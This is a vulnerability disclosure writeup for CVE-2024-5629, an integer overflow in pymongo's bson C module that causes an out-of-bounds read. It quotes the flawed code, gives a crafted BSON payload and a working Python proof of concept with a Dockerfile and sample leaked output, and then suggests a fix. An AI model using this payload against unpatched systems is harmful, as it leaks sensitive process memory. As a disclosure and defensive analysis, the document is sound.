CVE-2024-5629 writeup
Overview
Assigned CVE: CVE-2024-5629
Snyk advisory: SNYK-PYTHON-PYMONGO-7172112
GitHub advisory: GHSA-m87m-mmvp-v9qm
GitHub commit: PYTHON-4305 Fix bson size check (#1564)
Package details
Package manager: pip
Affected module: pymongo
GitHub repo: mongodb/mongo-python-driver
Module description:
The PyMongo distribution contains tools for interacting with MongoDB database from Python. The
bson
package is an implementation of the BSON format for Python. Thepymongo
package is a native Python driver for MongoDB. Thegridfs
package is a gridfs implementation on top ofpymongo
.
Vulnerability description
Out-of-bounds read in bson module. Possible risk: leak of sensitive data.
Vulnerability: integer overflow in bson deserialization. Using the crafted payload the attacker could force the parser to deserialize unmanaged memory. The parser tries to interpret bytes next to buffer and throws an exception with string. If the following bytes are not printable UTF-8 the parser throws an exception with a single byte.
Vulnerability details
Actual source code is here: https://github.com/mongodb/mongo-python-driver/tree/4.6.2
The vulnerability is located in file bson/_cbsonmodule.c. The interesting part is deserialization of type 15 (JavaScript code with scope):
case 15:
{
uint32_t c_w_s_size;
uint32_t code_size;
uint32_t scope_size;
PyObject* code;
PyObject* scope;
PyObject* code_type;
if (max < 8) {
goto invalid;
}
memcpy(&c_w_s_size, buffer + *position, 4);
c_w_s_size = BSON_UINT32_FROM_LE(c_w_s_size);
*position += 4;
if (max < c_w_s_size) {
goto invalid;
}
memcpy(&code_size, buffer + *position, 4);
code_size = BSON_UINT32_FROM_LE(code_size);
/* code_w_scope length + code length + code + scope length */
if (!code_size || max < code_size || max < 4 + 4 + code_size + 4) {
goto invalid;
}
*position += 4;
/* Strings must end in \0 */
if (buffer[*position + code_size - 1]) {
goto invalid;
}
code = PyUnicode_DecodeUTF8(
buffer + *position, code_size - 1,
options->unicode_decode_error_handler);
if (!code) {
goto invalid;
}
*position += code_size;
memcpy(&scope_size, buffer + *position, 4);
scope_size = BSON_UINT32_FROM_LE(scope_size);
if (scope_size < BSON_MIN_SIZE) {
Py_DECREF(code);
goto invalid;
}
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
Py_DECREF(code);
goto invalid;
}
/* Check for bad eoo */
if (buffer[*position + scope_size - 1]) {
goto invalid;
}
scope = elements_to_dict(self, buffer + *position + 4,
scope_size - 5, options);
if (!scope) {
Py_DECREF(code);
goto invalid;
}
*position += scope_size;
if ((code_type = _get_object(state->Code, "bson.code", "Code"))) {
value = PyObject_CallFunctionObjArgs(code_type, code, scope, NULL);
Py_DECREF(code_type);
}
Py_DECREF(code);
Py_DECREF(scope);
break;
}
The type “code with scope” contains the function code itself (usually JavaScript) and its scope, where the scope is a mapping of closured variables. The code is straightforward so I won’t describe it in details.
The vulnerable part is here:
/* code length + code + scope length + scope */
if ((4 + code_size + 4 + scope_size) != c_w_s_size) {
Py_DECREF(code);
goto invalid;
}
Please note that variables code_size
, scope_size
, and c_w_s_size
are controlled by attacker since they are stored in the input buffer as 4-byte integers. Since all variables are uint32_t integers it’s possible to trigger integer overflow here. We can set the scope_size
to “negative” value (in unsigned integers it means a “big” value) and bypass the check using crafted code_size
and c_w_s_size
values.
Then the scope_size
is passed to elements_to_dict()
function. If the variable is big enough the function will deserialize the unmanaged memory (next to buffer). This memory will be interpreted as bson structure with fields “type” and “fieldname”. If we set the “type” to some invalid value (for example \x00) bson will throw the exception with “fieldname” string.
The example of trigger (from PoC file):
bytes.fromhex(
struct.pack('<I', length).hex() + # payload size
'0f' + # type "code with scope"
'3100' + # key (cstring)
'0a000000' + # c_w_s_size
'04000000' + # code_size
'41004200' + # code (cstring)
'feffffff' + # scope_size
'02' + # type "string"
'3200' + # key (cstring)
struct.pack('<I', string_size).hex() + # string size
'00' * string_size # value (cstring)
# next bytes is a field name for type \x00
# type \x00 is invalid so bson throws an exception
)
The last ‘00’ byte is interpreted as type \x00, the next bytes (located after the managed buffer) will be interpreted as fieldname. Since the type \x00 is invalid the fieldname will be thrown.
Suggested fix
There is a check for c_w_s_size
variable only:
if (max < c_w_s_size) {
goto invalid;
}
I would suggest to add the same checks for code_size
and scope_size
variables. Then it becomes impossible to trigger integer overflow here.
How it was found
Usually the deserialization process is non-trivial and difficult to implement without bugs. I read the entire bson code carefully, especially the use of integer variables, and accidentally found this.
How to reproduce
I’ve tested it on Ubuntu 22.04.3 LTS, kernel version: 5.15.0-84-generic.
There is a simple PoC:
import bson
import struct
def function(length: int) -> bytes:
secret = b'X' * length
# do some stuff with secret
# ...
# variable 'secret' is deleted here
# but it's still stored in memory
def generate_payload(length: int) -> bytes:
string_size = length - 0x1e
return bytes.fromhex(
struct.pack('<I', length).hex() + # payload size
'0f' + # type "code with scope"
'3100' + # key (cstring)
'0a000000' + # c_w_s_size
'04000000' + # code_size
'41004200' + # code (cstring)
'feffffff' + # scope_size
'02' + # type "string"
'3200' + # key (cstring)
struct.pack('<I', string_size).hex() + # string size
'00' * string_size # value (cstring)
# next bytes is a field name for type \x00
# type \x00 is invalid so bson throws an exception
)
def deserialize_payload(payload: bytes) -> None:
try:
obj = bson.decode(payload) # throws exception
print(obj) # unreachable code
except Exception as e:
print(e)
print('## case 1: leak the printable string ##')
# uses secret internally
function(0x50 + 0x0F)
# payload could be read from stdin or similar
payload = generate_payload(0x50)
deserialize_payload(payload)
###
print('\n## case 2: leak some non-printable bytes ##')
for i in range(5):
# payload could be read from stdin or similar
payload = generate_payload(0x54f + i)
deserialize_payload(payload)
The PoC contains two cases:
- leak of the used variable, the arbitrary string from the memory could be leaked the same way
- leak of 5 single non-printable bytes
You could use the provided Dockerfile in order to preserve the environment:
FROM python:3.12@sha256:e83d1f4d0c735c7a54fc9dae3cca8c58473e3b3de08fcb7ba3d342ee75cfc09d
RUN pip install pymongo==4.6.2
COPY poc.py /tmp/poc.py
ENTRYPOINT python3 -u /tmp/poc.py
- Build the image
docker build --tag pymongo-poc .
- Run the image
docker run --rm pymongo-poc
- Expected behaviour
$ docker run --rm pymongo-poc
## case 1: leak the printable string ##
Detected unknown BSON type b'\x00' for fieldname 'XXXXXXXXXXXXXX'. Are you using the latest driver version?
## case 2: leak some non-printable bytes ##
'utf-8' codec can't decode byte 0x90 in position 1: invalid start byte
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte
'utf-8' codec can't decode byte 0x98 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xf7 in position 0: invalid start byte
'utf-8' codec can't decode byte 0xff in position 0: invalid start byte
Please note that XXXXXXXXXXXXXX
is a part of the secret
variable. The bytes [0x90, 0xfc, 0x98, 0xf7, 0xff]
could be consecutive bytes from process memory.
Conclusion
The bug has been fixed in v4.6.3, changelog: https://pymongo.readthedocs.io/en/4.7.0/changelog.html#changes-in-version-4-6-3